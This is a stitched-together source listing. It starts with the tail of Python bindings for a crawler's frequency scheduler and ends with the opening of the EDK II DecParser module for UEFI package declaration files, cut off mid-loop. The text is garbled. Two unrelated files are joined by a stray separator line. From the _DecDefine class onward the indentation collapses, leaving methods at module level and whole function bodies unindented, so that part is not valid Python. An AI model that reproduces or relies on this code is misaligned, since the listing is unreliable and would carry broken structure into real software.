        freq_margin = settings.get('FREQ_MARGIN', -1.0)
        scheduler.margin = freq_margin
        return scheduler

    def load_simple(self, freq_default=1.0, freq_scale=None):
        # A freq_scale of None is forwarded to C as -1.0; note that a
        # freq_scale of 0.0 also maps to -1.0 because of the `or`.
        self._c_aduana.freq_scheduler_load_simple(
            self._sch[0], freq_default, freq_scale or -1.0)

    def load(self, freq_iter):
        """Bulk-load (page_hash, frequency) pairs through a C-side cursor."""
        cur = ffi.new('void **')
        ret = self._c_aduana.freq_scheduler_cursor_open(self._sch[0], cur)
        if ret != 0:
            raise PageDBException.from_error(self._sch[0].error)
        for page_hash, page_freq in freq_iter:
            self._c_aduana.freq_scheduler_cursor_write(
                self._sch[0],
                cur[0],
                ffi.cast('uint64_t', page_hash),
                page_freq
            )
        # Commit all writes in one transaction.
        ret = self._c_aduana.freq_scheduler_cursor_commit(self._sch[0], cur[0])
        if ret != 0:
            raise PageDBException.from_error(self._sch[0].error)

    def add(self, crawled_page):
        return self._core.add(crawled_page)

    def requests(self, n_pages):
        return self._core.requests(n_pages)

    def __del__(self):
        self._c_aduana.freq_scheduler_delete(self._sch[0])

    @property
    def max_n_crawls(self):
        # NOTE(review): presumably the max number of re-crawls per page —
        # confirm against the C library docs.
        return self._sch[0].max_n_crawls

    @max_n_crawls.setter
    def max_n_crawls(self, value):
        self._sch[0].max_n_crawls = value

    @property
    def margin(self):
        return self._sch[0].margin

    @margin.setter
    def margin(self, value):
        self._sch[0].margin = value
def freq_spec(page_db, path):
    """Yield ``(page_hash, crawl_frequency)`` pairs from a spec file.

    Each line of the file at *path* has two whitespace-separated columns:
    a regular expression and an action.  For every page in *page_db*, the
    first rule whose regex matches the page URL decides the frequency:

    - ``xN`` multiplies the page's current rate by the float ``N``
    - a plain float ``T`` is treated as an interval, yielding ``1.0/T``

    Malformed actions are reported with ``warnings.warn`` and that rule is
    skipped (the next matching rule, if any, is tried).
    """
    rules = []
    with open(path, 'r') as spec:
        for line in spec:
            cols = line.split()
            if len(cols) == 2:
                rules.append(
                    (re.compile(cols[0]), cols[1]))
    for page_info in page_db.iter_page_info():
        for regexp, action in rules:
            if regexp.match(page_info.url):
                if action[0] == 'x':
                    try:
                        mult = float(action[1:])
                    except ValueError:
                        # BUGFIX: was `warning.warn(...)` (NameError — the
                        # module is `warnings`) and then fell through to use
                        # the undefined `mult`. Also pass one formatted
                        # message: warn()'s second argument is a category.
                        warnings.warn("Could not parse multiplier: " + action)
                        continue  # malformed rule: try the next one
                    yield hash(page_info), mult * page_info.rate
                else:
                    try:
                        interval = float(action)
                    except ValueError:
                        warnings.warn("Could not parse interval: " + action)
                        continue  # malformed rule: try the next one
                    yield hash(page_info), 1.0 / interval
                break  # stop after we find a rule
if __name__ == '__main__':
    # Smoke test for the bindings: build a PageDB, attach a PageRank
    # scorer, then feed 100k synthetic pages whose links point at the
    # next ten numeric URLs. (Python 2 only: uses xrange.)
    db = PageDB('./test_python_bindings')
    scorer = PageRankScorer(db)
    bf = BFScheduler(db, scorer=scorer)
    for i in xrange(100000):
        cp = CrawledPage(str(i), [str(i + j) for j in xrange(10)])
        bf.add(cp)
| |
## @file
# This file is used to parse a DEC file. It will be consumed by DecParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials are licensed and made available
# under the terms and conditions of the BSD License which accompanies this
# distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
'''
DecParser
'''
## Import modules
#
import Logger.Log as Logger
from Logger.ToolError import FILE_PARSE_FAILURE
from Logger.ToolError import FILE_OPEN_FAILURE
from Logger import StringTable as ST
from Logger.ToolError import FORMAT_INVALID
import Library.DataType as DT
from Library.ParserValidate import IsValidToken
from Library.ParserValidate import IsValidPath
from Library.ParserValidate import IsValidCFormatGuid
from Library.ParserValidate import IsValidIdString
from Library.ParserValidate import IsValidUserId
from Library.ParserValidate import IsValidArch
from Library.ParserValidate import IsValidWord
from Library.ParserValidate import IsValidDecVersionVal
from Parser.DecParserMisc import TOOL_NAME
from Parser.DecParserMisc import CleanString
from Parser.DecParserMisc import IsValidPcdDatum
from Parser.DecParserMisc import ParserHelper
from Parser.DecParserMisc import StripRoot
from Parser.DecParserMisc import VERSION_PATTERN
from Parser.DecParserMisc import CVAR_PATTERN
from Parser.DecParserMisc import PCD_TOKEN_PATTERN
from Parser.DecParserMisc import MACRO_PATTERN
from Parser.DecParserMisc import FileContent
from Object.Parser.DecObject import _DecComments
from Object.Parser.DecObject import DecDefineObject
from Object.Parser.DecObject import DecDefineItemObject
from Object.Parser.DecObject import DecIncludeObject
from Object.Parser.DecObject import DecIncludeItemObject
from Object.Parser.DecObject import DecLibraryclassObject
from Object.Parser.DecObject import DecLibraryclassItemObject
from Object.Parser.DecObject import DecGuidObject
from Object.Parser.DecObject import DecPpiObject
from Object.Parser.DecObject import DecProtocolObject
from Object.Parser.DecObject import DecGuidItemObject
from Object.Parser.DecObject import DecUserExtensionObject
from Object.Parser.DecObject import DecUserExtensionItemObject
from Object.Parser.DecObject import DecPcdObject
from Object.Parser.DecObject import DecPcdItemObject
from Library.Misc import GuidStructureStringToGuidString
from Library.Misc import CheckGuidRegFormat
from Library.StringUtils import ReplaceMacro
from Library.StringUtils import GetSplitValueList
from Library.StringUtils import gMACRO_PATTERN
from Library.StringUtils import ConvertSpecialChar
from Library.CommentParsing import ParsePcdErrorCode
##
# _DecBase class for parsing
#
class _DecBase:
    """Base class for DEC section parsers: template parsing loop, macro
    expansion, backslash continuation and redefinition checking."""

    def __init__(self, RawData):
        self._RawData = RawData
        self._ItemDict = {}
        self._LocalMacro = {}
        #
        # Data parsed by 'self' are saved to this object
        #
        self.ItemObject = None

    def GetDataObject(self):
        return self.ItemObject

    def GetLocalMacro(self):
        return self._LocalMacro

    ## BlockStart
    #
    # Called if a new section starts
    #
    def BlockStart(self):
        self._LocalMacro = {}

    ## _CheckReDefine
    #
    # @param Key: to be checked if multi-defined
    # @param Scope: Format: [[SectionName, Arch], ...].
    #        If scope is none, use global scope
    #
    def _CheckReDefine(self, Key, Scope = None):
        if not Scope:
            # BUGFIX: a stray `return` here made the entire redefinition
            # check a no-op whenever the caller passed no explicit Scope
            # (the common case): fall through with the current scope.
            Scope = self._RawData.CurrentScope
        SecArch = []
        #
        # Copy scope to SecArch, avoid Scope be changed outside
        #
        SecArch[0:1] = Scope[:]
        if Key not in self._ItemDict:
            self._ItemDict[Key] = [[SecArch, self._RawData.LineIndex]]
            return
        for Value in self._ItemDict[Key]:
            for SubValue in Scope:
                #
                # If current is common section
                #
                if SubValue[-1] == 'COMMON':
                    for Other in Value[0]:
                        # Key in common cannot be redefined in other arches
                        # [:-1] means stripping arch info
                        if Other[:-1] == SubValue[:-1]:
                            self._LoggerError(ST.ERR_DECPARSE_REDEFINE % (Key, Value[1]))
                            return
                    continue
                CommonScope = []
                CommonScope[0:1] = SubValue
                CommonScope[-1] = 'COMMON'
                #
                # Cannot be redefined if this key already defined in COMMON Or defined in same arch
                #
                if SubValue in Value[0] or CommonScope in Value[0]:
                    self._LoggerError(ST.ERR_DECPARSE_REDEFINE % (Key, Value[1]))
                    return
        self._ItemDict[Key].append([SecArch, self._RawData.LineIndex])

    ## CheckRequiredFields
    # Some sections need to check if some fields exist, define section for example
    # Derived class can re-implement, top parser will call this function after all parsing done
    #
    def CheckRequiredFields(self):
        if self._RawData:
            pass
        return True

    ## IsItemRequired
    # In DEC spec, sections must have at least one statement except user
    # extension.
    # For example: "[guids" [<attribs>] "]" <EOL> <statements>+
    # sub class can override this method to indicate if statement is a must.
    #
    def _IsStatementRequired(self):
        if self._RawData:
            pass
        return False

    def _LoggerError(self, ErrorString):
        # Report a fatal parse error at the current line.
        Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
                     Line = self._RawData.LineIndex,
                     ExtraData=ErrorString + ST.ERR_DECPARSE_LINE % self._RawData.CurrentLine)

    def _ReplaceMacro(self, String):
        # Expand local macros first, then file-level macros; error out if
        # any $(MACRO) reference remains unresolved.
        if gMACRO_PATTERN.findall(String):
            String = ReplaceMacro(String, self._LocalMacro, False,
                                  FileName = self._RawData.Filename,
                                  Line = ['', self._RawData.LineIndex])
            String = ReplaceMacro(String, self._RawData.Macros, False,
                                  FileName = self._RawData.Filename,
                                  Line = ['', self._RawData.LineIndex])
            MacroUsed = gMACRO_PATTERN.findall(String)
            if MacroUsed:
                Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE,
                             File=self._RawData.Filename,
                             Line = self._RawData.LineIndex,
                             ExtraData = ST.ERR_DECPARSE_MACRO_RESOLVE % (str(MacroUsed), String))
        return String

    def _MacroParser(self, String):
        # Parse a "DEFINE NAME = VALUE" line into the local macro table.
        TokenList = GetSplitValueList(String, ' ', 1)
        if len(TokenList) < 2 or TokenList[1] == '':
            self._LoggerError(ST.ERR_DECPARSE_MACRO_PAIR)
        TokenList = GetSplitValueList(TokenList[1], DT.TAB_EQUAL_SPLIT, 1)
        if TokenList[0] == '':
            self._LoggerError(ST.ERR_DECPARSE_MACRO_NAME)
        elif not IsValidToken(MACRO_PATTERN, TokenList[0]):
            self._LoggerError(ST.ERR_DECPARSE_MACRO_NAME_UPPER % TokenList[0])
        if len(TokenList) == 1:
            # "DEFINE NAME =" means an empty value.
            self._LocalMacro[TokenList[0]] = ''
        else:
            self._LocalMacro[TokenList[0]] = self._ReplaceMacro(TokenList[1])

    ## _ParseItem
    #
    # Parse specified item, this function must be derived by subclass
    #
    def _ParseItem(self):
        if self._RawData:
            pass
        #
        # Should never be called
        #
        return None

    ## _TailCommentStrategy
    #
    # This function can be derived to parse tail comment
    # default is it will not consume any lines
    #
    # @param Comment: Comment of current line
    #
    def _TailCommentStrategy(self, Comment):
        if Comment:
            pass
        if self._RawData:
            pass
        return False

    ## _StopCurrentParsing
    #
    # Called in Parse if current parsing should be stopped when encounter some
    # keyword
    # Default is section start and end
    #
    # @param Line: Current line
    #
    def _StopCurrentParsing(self, Line):
        if self._RawData:
            pass
        return Line[0] == DT.TAB_SECTION_START and Line[-1] == DT.TAB_SECTION_END

    ## _TryBackSlash
    #
    # Split comment and DEC content, concatenate lines if end of char is '\'
    #
    # @param ProcessedLine: ProcessedLine line
    # @param ProcessedComments: ProcessedComments line
    #
    def _TryBackSlash(self, ProcessedLine, ProcessedComments):
        CatLine = ''
        Comment = ''
        Line = ProcessedLine
        CommentList = ProcessedComments
        while not self._RawData.IsEndOfFile():
            if Line == '':
                self._LoggerError(ST.ERR_DECPARSE_BACKSLASH_EMPTY)
                break
            if Comment:
                CommentList.append((Comment, self._RawData.LineIndex))
            if Line[-1] != DT.TAB_SLASH:
                # No continuation: this is the final fragment.
                CatLine += Line
                break
            elif len(Line) < 2 or Line[-2] != ' ':
                # A continuation backslash must be preceded by a space.
                self._LoggerError(ST.ERR_DECPARSE_BACKSLASH)
            else:
                # Strip the trailing backslash and keep concatenating.
                CatLine += Line[:-1]
            Line, Comment = CleanString(self._RawData.GetNextLine())
        #
        # Reach end of content
        #
        if self._RawData.IsEndOfFile():
            if not CatLine:
                if ProcessedLine[-1] == DT.TAB_SLASH:
                    self._LoggerError(ST.ERR_DECPARSE_BACKSLASH_EMPTY)
                CatLine = ProcessedLine
            else:
                if not Line or Line[-1] == DT.TAB_SLASH:
                    self._LoggerError(ST.ERR_DECPARSE_BACKSLASH_EMPTY)
                CatLine += Line
        #
        # All MACRO values defined by the DEFINE statements in any section
        # (except [Userextensions] sections for Intel) of the INF or DEC file
        # must be expanded before processing of the file.
        #
        __IsReplaceMacro = True
        Header = self._RawData.CurrentScope[0] if self._RawData.CurrentScope else None
        if Header and len(Header) > 2:
            if Header[0].upper() == 'USEREXTENSIONS' and not (Header[1] == 'TianoCore' and Header[2] == '"ExtraFiles"'):
                __IsReplaceMacro = False
        if __IsReplaceMacro:
            self._RawData.CurrentLine = self._ReplaceMacro(CatLine)
        else:
            self._RawData.CurrentLine = CatLine
        return CatLine, CommentList

    ## Parse
    # This is a template method in which other member functions which might
    # override by sub class are called. It is responsible for reading file
    # line by line, and call other member functions to parse. This function
    # should not be re-implement by sub class.
    #
    def Parse(self):
        HeadComments = []
        TailComments = []
        #======================================================================
        # CurComments may pointer to HeadComments or TailComments
        #======================================================================
        CurComments = HeadComments
        CurObj = None
        ItemNum = 0
        FromBuf = False
        #======================================================================
        # Used to report error information if empty section found
        #======================================================================
        Index = self._RawData.LineIndex
        LineStr = self._RawData.CurrentLine
        while not self._RawData.IsEndOfFile() or self._RawData.NextLine:
            if self._RawData.NextLine:
                #==============================================================
                # Have processed line in buffer
                #==============================================================
                Line = self._RawData.NextLine
                HeadComments.extend(self._RawData.HeadComment)
                TailComments.extend(self._RawData.TailComment)
                self._RawData.ResetNext()
                Comment = ''
                FromBuf = True
            else:
                #==============================================================
                # No line in buffer, read next line
                #==============================================================
                Line, Comment = CleanString(self._RawData.GetNextLine())
                FromBuf = False
            if Line:
                if not FromBuf and CurObj and TailComments:
                    #==========================================================
                    # Set tail comments to previous statement if not empty.
                    #==========================================================
                    CurObj.SetTailComment(CurObj.GetTailComment()+TailComments)
                if not FromBuf:
                    del TailComments[:]
                CurComments = TailComments
                Comments = []
                if Comment:
                    Comments = [(Comment, self._RawData.LineIndex)]
                #==============================================================
                # Try if last char of line has backslash
                #==============================================================
                Line, Comments = self._TryBackSlash(Line, Comments)
                CurComments.extend(Comments)
                #==============================================================
                # Macro found
                #==============================================================
                if Line.startswith('DEFINE '):
                    self._MacroParser(Line)
                    del HeadComments[:]
                    del TailComments[:]
                    CurComments = HeadComments
                    continue
                if self._StopCurrentParsing(Line):
                    #==========================================================
                    # This line does not belong to this parse,
                    # Save it, can be used by next parse
                    #==========================================================
                    self._RawData.SetNext(Line, HeadComments, TailComments)
                    break
                Obj = self._ParseItem()
                ItemNum += 1
                if Obj:
                    Obj.SetHeadComment(Obj.GetHeadComment()+HeadComments)
                    Obj.SetTailComment(Obj.GetTailComment()+TailComments)
                    del HeadComments[:]
                    del TailComments[:]
                    CurObj = Obj
                else:
                    CurObj = None
            else:
                if id(CurComments) == id(TailComments):
                    #==========================================================
                    # Check if this comment belongs to tail comment
                    #==========================================================
                    if not self._TailCommentStrategy(Comment):
                        CurComments = HeadComments
                if Comment:
                    CurComments.append(((Comment, self._RawData.LineIndex)))
                else:
                    # A fully blank line discards pending comments.
                    del CurComments[:]
        if self._IsStatementRequired() and ItemNum == 0:
            Logger.Error(
                TOOL_NAME, FILE_PARSE_FAILURE,
                File=self._RawData.Filename,
                Line=Index,
                ExtraData=ST.ERR_DECPARSE_STATEMENT_EMPTY % LineStr
            )
## _DecDefine
# Parse define section
#
class _DecDefine(_DecBase):
def __init__(self, RawData):
    _DecBase.__init__(self, RawData)
    # Object collecting the parsed define key/value items.
    self.ItemObject = DecDefineObject(RawData.Filename)
    # DEFINE statements in [Defines] populate the file-level macro table.
    self._LocalMacro = self._RawData.Macros
    # Number of [Defines] sections seen so far (only one is allowed).
    self._DefSecNum = 0
    #
    # Each field has a function to validate
    #
    self.DefineValidation = {
        DT.TAB_DEC_DEFINES_DEC_SPECIFICATION : self._SetDecSpecification,
        DT.TAB_DEC_DEFINES_PACKAGE_NAME : self._SetPackageName,
        DT.TAB_DEC_DEFINES_PACKAGE_GUID : self._SetPackageGuid,
        DT.TAB_DEC_DEFINES_PACKAGE_VERSION : self._SetPackageVersion,
        DT.TAB_DEC_DEFINES_PKG_UNI_FILE : self._SetPackageUni,
    }
def BlockStart(self):
    """Record entry into a [Defines] section; at most one is allowed."""
    self._DefSecNum += 1
    if self._DefSecNum <= 1:
        return
    self._LoggerError(ST.ERR_DECPARSE_DEFINE_MULTISEC)
## CheckRequiredFields
#
# Check required fields: DEC_SPECIFICATION, PACKAGE_NAME
# PACKAGE_GUID, PACKAGE_VERSION
#
def CheckRequiredFields(self):
    # Report the first missing required key via Logger.Error; return True
    # only when all four required keys were set.
    Ret = False
    if self.ItemObject.GetPackageSpecification() == '':
        Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
                     ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_DEC_SPECIFICATION)
    elif self.ItemObject.GetPackageName() == '':
        Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
                     ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_PACKAGE_NAME)
    elif self.ItemObject.GetPackageGuid() == '':
        Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
                     ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_PACKAGE_GUID)
    elif self.ItemObject.GetPackageVersion() == '':
        Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
                     ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_PACKAGE_VERSION)
    else:
        Ret = True
    return Ret
def _ParseItem(self):
Line = self._RawData.CurrentLine
TokenList = GetSplitValueList(Line, DT.TAB_EQUAL_SPLIT, 1)
if TokenList[0] == DT.TAB_DEC_DEFINES_PKG_UNI_FILE:
self.DefineValidation[TokenList[0]](TokenList[1])
elif len(TokenList) < 2:
self._LoggerError(ST.ERR_DECPARSE_DEFINE_FORMAT)
elif TokenList[0] not in self.DefineValidation:
self._LoggerError(ST.ERR_DECPARSE_DEFINE_UNKNOWKEY % TokenList[0])
else:
self.DefineValidation[TokenList[0]](TokenList[1])
DefineItem = DecDefineItemObject()
DefineItem.Key = TokenList[0]
DefineItem.Value = TokenList[1]
self.ItemObject.AddItem(DefineItem, self._RawData.CurrentScope)
return DefineItem
def _SetDecSpecification(self, Token):
if self.ItemObject.GetPackageSpecification():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_DEC_SPECIFICATION)
if not IsValidToken('0[xX][0-9a-fA-F]{8}', Token):
if not IsValidDecVersionVal(Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_SPEC)
self.ItemObject.SetPackageSpecification(Token)
def _SetPackageName(self, Token):
if self.ItemObject.GetPackageName():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PACKAGE_NAME)
if not IsValidWord(Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGNAME)
self.ItemObject.SetPackageName(Token)
def _SetPackageGuid(self, Token):
if self.ItemObject.GetPackageGuid():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PACKAGE_GUID)
if not CheckGuidRegFormat(Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGGUID)
self.ItemObject.SetPackageGuid(Token)
def _SetPackageVersion(self, Token):
if self.ItemObject.GetPackageVersion():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PACKAGE_VERSION)
if not IsValidToken(VERSION_PATTERN, Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGVERSION)
else:
if not DT.TAB_SPLIT in Token:
Token = Token + '.0'
self.ItemObject.SetPackageVersion(Token)
def _SetPackageUni(self, Token):
if self.ItemObject.GetPackageUniFile():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PKG_UNI_FILE)
self.ItemObject.SetPackageUniFile(Token)
## _DecInclude
#
# Parse include section
#
class _DecInclude(_DecBase):
    """Parser for [Includes] sections of a DEC file."""
    def __init__(self, RawData):
        _DecBase.__init__(self, RawData)
        self.ItemObject = DecIncludeObject(RawData.Filename)
    def _ParseItem(self):
        """Validate the include path on the current line and record it."""
        IncludePath = self._RawData.CurrentLine
        if not IsValidPath(IncludePath, self._RawData.PackagePath):
            self._LoggerError(ST.ERR_DECPARSE_INCLUDE % IncludePath)
        NewItem = DecIncludeItemObject(
            StripRoot(self._RawData.PackagePath, IncludePath),
            self._RawData.PackagePath)
        self.ItemObject.AddItem(NewItem, self._RawData.CurrentScope)
        return NewItem
## _DecLibraryclass
#
# Parse library class section
#
class _DecLibraryclass(_DecBase):
    """Parser for [LibraryClasses] sections of a DEC file."""
    def __init__(self, RawData):
        _DecBase.__init__(self, RawData)
        self.ItemObject = DecLibraryclassObject(RawData.Filename)
    def _ParseItem(self):
        """Parse one 'LibName|Path/To/Header.h' line and record it."""
        Fields = GetSplitValueList(self._RawData.CurrentLine, DT.TAB_VALUE_SPLIT)
        # Exactly two non-empty fields are required.
        if len(Fields) != 2:
            self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_SPLIT)
        if Fields[0] == '' or Fields[1] == '':
            self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_EMPTY)
        # Library class names start with a capital letter, alphanumeric after.
        if not IsValidToken('[A-Z][0-9A-Za-z]*', Fields[0]):
            self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_LIB)
        self._CheckReDefine(Fields[0])
        HeaderPath = Fields[1]
        # The header must carry a '.h' extension ...
        if not HeaderPath.endswith('.h'):
            self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_PATH_EXT)
        # ... and must exist under the package root.
        if not IsValidPath(HeaderPath, self._RawData.PackagePath):
            self._LoggerError(ST.ERR_DECPARSE_INCLUDE % HeaderPath)
        NewItem = DecLibraryclassItemObject(
            Fields[0],
            StripRoot(self._RawData.PackagePath, HeaderPath),
            self._RawData.PackagePath)
        self.ItemObject.AddItem(NewItem, self._RawData.CurrentScope)
        return NewItem
## _DecPcd
#
# Parse PCD section
#
class _DecPcd(_DecBase):
    """Parser for the PCD declaration sections of a DEC file.

    Each line has the form:
        TokenSpaceGuidCName.PcdCName|DefaultValue|DatumType|Token
    The default value may itself contain '|' (C array), so the middle
    fields are re-joined after splitting.
    """
    def __init__(self, RawData):
        _DecBase.__init__(self, RawData)
        self.ItemObject = DecPcdObject(RawData.Filename)
        #
        # Used to check duplicate token
        # Key is token space and token number (integer), value is C name
        #
        self.TokenMap = {}
    def _ParseItem(self):
        """Parse and validate one PCD declaration line; returns DecPcdItemObject."""
        Line = self._RawData.CurrentLine
        TokenList = Line.split(DT.TAB_VALUE_SPLIT)
        if len(TokenList) < 4:
            self._LoggerError(ST.ERR_DECPARSE_PCD_SPLIT)
        #
        # Token space guid C name
        #
        PcdName = GetSplitValueList(TokenList[0], DT.TAB_SPLIT)
        if len(PcdName) != 2 or PcdName[0] == '' or PcdName[1] == '':
            self._LoggerError(ST.ERR_DECPARSE_PCD_NAME)
        Guid = PcdName[0]
        if not IsValidToken(CVAR_PATTERN, Guid):
            self._LoggerError(ST.ERR_DECPARSE_PCD_CVAR_GUID)
        #
        # PCD C name
        #
        CName = PcdName[1]
        if not IsValidToken(CVAR_PATTERN, CName):
            self._LoggerError(ST.ERR_DECPARSE_PCD_CVAR_PCDCNAME)
        self._CheckReDefine(Guid + DT.TAB_SPLIT + CName)
        #
        # Default value, may be C array, string or number
        # (re-joined because a C-array value may itself contain '|')
        #
        Data = DT.TAB_VALUE_SPLIT.join(TokenList[1:-2]).strip()
        #
        # PCD data type
        #
        DataType = TokenList[-2].strip()
        Valid, Cause = IsValidPcdDatum(DataType, Data)
        if not Valid:
            self._LoggerError(Cause)
        PcdType = self._RawData.CurrentScope[0][0]
        # Feature-flag PCDs must be BOOLEAN.
        if PcdType == DT.TAB_PCDS_FEATURE_FLAG_NULL.upper() and DataType != 'BOOLEAN':
            self._LoggerError(ST.ERR_DECPARSE_PCD_FEATUREFLAG)
        #
        # Token value is the last element in list.
        #
        Token = TokenList[-1].strip()
        if not IsValidToken(PCD_TOKEN_PATTERN, Token):
            self._LoggerError(ST.ERR_DECPARSE_PCD_TOKEN % Token)
        elif not Token.startswith('0x') and not Token.startswith('0X'):
            # Decimal token: must fit in 32 bits, then normalize to hex form.
            if int(Token) > 4294967295:
                self._LoggerError(ST.ERR_DECPARSE_PCD_TOKEN_INT % Token)
            Token = '0x%x' % int(Token)
        # Within one token space, a token number must map to a single C name.
        IntToken = int(Token, 0)
        if (Guid, IntToken) in self.TokenMap:
            if self.TokenMap[Guid, IntToken] != CName:
                self._LoggerError(ST.ERR_DECPARSE_PCD_TOKEN_UNIQUE%(Token))
        else:
            self.TokenMap[Guid, IntToken] = CName
        Item = DecPcdItemObject(Guid, CName, Data, DataType, Token)
        self.ItemObject.AddItem(Item, self._RawData.CurrentScope)
        return Item
## _DecGuid
#
# Parse GUID, PPI, Protocol section
#
class _DecGuid(_DecBase):
    """Parser for [Guids], [Ppis] and [Protocols] sections of a DEC file.

    One parser instance serves all three section kinds; items are routed
    to the matching data object via ObjectDict keyed by section name.
    """
    def __init__(self, RawData):
        _DecBase.__init__(self, RawData)
        self.GuidObj = DecGuidObject(RawData.Filename)
        self.PpiObj = DecPpiObject(RawData.Filename)
        self.ProtocolObj = DecProtocolObject(RawData.Filename)
        # Upper-cased section name -> data object receiving parsed items.
        self.ObjectDict = \
        {
            DT.TAB_GUIDS.upper() : self.GuidObj,
            DT.TAB_PPIS.upper() : self.PpiObj,
            DT.TAB_PROTOCOLS.upper() : self.ProtocolObj
        }
    def GetDataObject(self):
        """Return the data object for the current section, or None if no scope."""
        if self._RawData.CurrentScope:
            return self.ObjectDict[self._RawData.CurrentScope[0][0]]
        return None
    def GetGuidObject(self):
        return self.GuidObj
    def GetPpiObject(self):
        return self.PpiObj
    def GetProtocolObject(self):
        return self.ProtocolObj
    def _ParseItem(self):
        """Parse one 'CName = GUID' line; GUID may be registry or C-struct format."""
        Line = self._RawData.CurrentLine
        TokenList = GetSplitValueList(Line, DT.TAB_EQUAL_SPLIT, 1)
        if len(TokenList) < 2:
            self._LoggerError(ST.ERR_DECPARSE_CGUID)
        if TokenList[0] == '':
            self._LoggerError(ST.ERR_DECPARSE_CGUID_NAME)
        if TokenList[1] == '':
            self._LoggerError(ST.ERR_DECPARSE_CGUID_GUID)
        if not IsValidToken(CVAR_PATTERN, TokenList[0]):
            self._LoggerError(ST.ERR_DECPARSE_PCD_CVAR_GUID)
        self._CheckReDefine(TokenList[0])
        if TokenList[1][0] != '{':
            # Registry format: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
            if not CheckGuidRegFormat(TokenList[1]):
                self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGGUID)
            GuidString = TokenList[1]
        else:
            #
            # Convert C format GUID to GUID string and Simple error check
            #
            GuidString = GuidStructureStringToGuidString(TokenList[1])
            if TokenList[1][0] != '{' or TokenList[1][-1] != '}' or GuidString == '':
                self._LoggerError(ST.ERR_DECPARSE_CGUID_GUIDFORMAT)
            #
            # Check C format GUID
            #
            if not IsValidCFormatGuid(TokenList[1]):
                self._LoggerError(ST.ERR_DECPARSE_CGUID_GUIDFORMAT)
        Item = DecGuidItemObject(TokenList[0], TokenList[1], GuidString)
        ItemObject = self.ObjectDict[self._RawData.CurrentScope[0][0]]
        ItemObject.AddItem(Item, self._RawData.CurrentScope)
        return Item
## _DecUserExtension
#
# Parse user extension section
#
class _DecUserExtension(_DecBase):
    """Parser for [UserExtensions] sections of a DEC file."""
    def __init__(self, RawData):
        _DecBase.__init__(self, RawData)
        self.ItemObject = DecUserExtensionObject(RawData.Filename)
        # All section headers seen so far across the file; duplicates are errors.
        self._Headers = []
        # Items belonging to the section block currently being parsed.
        self._CurItems = []
    def BlockStart(self):
        """Start a new [UserExtensions] block: register its headers as items.

        One item is created per unique (UserId, IdString) pair; a further
        header with the same pair only extends that item's ArchAndModuleType.
        """
        self._CurItems = []
        for Header in self._RawData.CurrentScope:
            if Header in self._Headers:
                self._LoggerError(ST.ERR_DECPARSE_UE_DUPLICATE)
            else:
                self._Headers.append(Header)
            # for..else: the else branch runs when no existing item matched.
            for Item in self._CurItems:
                if Item.UserId == Header[1] and Item.IdString == Header[2]:
                    Item.ArchAndModuleType.append(Header[3])
                    break
            else:
                Item = DecUserExtensionItemObject()
                Item.UserId = Header[1]
                Item.IdString = Header[2]
                Item.ArchAndModuleType.append(Header[3])
                self._CurItems.append(Item)
                self.ItemObject.AddItem(Item, None)
        # Macros do not carry over into a user-extension block.
        self._LocalMacro = {}
    def _ParseItem(self):
        """Append the raw line to the UserString of every item in this block."""
        Line = self._RawData.CurrentLine
        Item = None
        for Item in self._CurItems:
            if Item.UserString:
                Item.UserString = '\n'.join([Item.UserString, Line])
            else:
                Item.UserString = Line
        # Returns the last item touched (or None when the block has no items).
        return Item
## Dec
#
# Top dec parser
#
class Dec(_DecBase, _DecComments):
    """Top-level DEC file parser.

    Reads the file, strips [Private] sections into self._Private, consumes
    PCD-error comments and the file/binary header comment blocks, then
    dispatches every section to the matching section parser
    (_DecDefine, _DecInclude, _DecGuid, _DecLibraryclass, _DecPcd,
    _DecUserExtension).
    """
    def __init__(self, DecFile, Parse = True):
        # NOTE(review): the file handle is never closed explicitly; it relies
        # on interpreter cleanup.
        try:
            Content = ConvertSpecialChar(open(DecFile, 'r').readlines())
        except BaseException:
            Logger.Error(TOOL_NAME, FILE_OPEN_FAILURE, File=DecFile,
                         ExtraData=ST.ERR_DECPARSE_FILEOPEN % DecFile)
        #
        # Pre-parser for Private section: lines inside a [... Private] section
        # header are collected into self._Private and removed from the content
        # handed to the main parser.
        #
        self._Private = ''
        __IsFoundPrivate = False
        NewContent = []
        for Line in Content:
            Line = Line.strip()
